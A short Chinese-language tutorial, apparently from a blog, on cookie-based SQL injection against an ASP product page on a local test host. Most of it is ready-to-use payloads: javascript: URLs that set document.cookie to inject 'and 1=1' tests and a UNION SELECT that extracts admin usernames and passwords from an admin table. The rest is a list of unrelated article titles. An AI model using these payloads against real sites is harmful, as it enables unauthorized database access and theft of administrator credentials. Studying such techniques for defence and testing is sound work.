1.先访问当前注入点文件名

2.修改cookie

javascript:alert(document.cookie="id="+escape("1137"));

把当前站点的cookie内容修改为id=260 并且弹窗显示出当前的cookie内容

注入点:

http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?id=1137

注入点文件名:

http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?

javascript:alert(document.cookie="id="+escape("260"));

内容:document.cookie="id="+escape("260")

document.cookie //修改cookie

"id="+escape("260")

//id是咱们注入点的参数

260 //参数值

javascript //使用js语句

alert //弹出窗口，

javascript:alert(document.cookie="id="+escape("1137"));

把当前站点的cookie内容修改为id=260 并且弹窗显示出当前的cookie内容

判断是否存在注入

javascript:alert(document.cookie="id="+escape("1137 and 1=1"));

返回正常

javascript:alert(document.cookie="id="+escape("1137 and 1=221"));

返回错误

查询指定管理员

javascript:alert(document.cookie="id="+escape("1137 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin where id=40"));

最新文章

1. 理解CSS外边距margin
2. clr enabled Server Configuration Option
3. iOS 简单滤镜
4. APNS推送通知消息负载内容和本地格式字符串
5. 编码实现Spring 利用@Resource注解实现bean的注入，xml实现基本数据类型的注入
6. 【Linux】rpm -qa 和 rpm -q
7. hdu1003 dp（最大子段和）
8. JavaScript jQuery 入门回顾 2
9. 禁止UINavigationController 左滑 返回的效果
10. hrbust 1328 相等的最小公倍数(数论）
11. js的框架
12. 使用Bootstrap
13. mysqlfront提示过期解决方式
14. 我的踩坑之旅-跨域问题引发bug
15. [bzoj3875] [Ahoi2014]骑士游戏
16. JavaScript里面的循环方法小结
17. laravel rbac的用户 角色 权限的crud
18. zabbix实现自定义监控
19. python--第十一天总结（paramiko 及数据库操作）
20. java 验证字符串是否包含中文字符

热门文章

1. iOS 面试题（二）：什么时候在 block 中不需要使用 weakSelf --转自唐巧
2. New line
3. ubuntu安装mysql--PC端
4. Excel 同时打开2个或多个独立窗口
5. Python爬虫爬取百度贴吧的帖子
6. AjaxStudyNote
7. hashCode的作用
8. 横向不间断滚动DIV
9. nginx auth
10. java学习点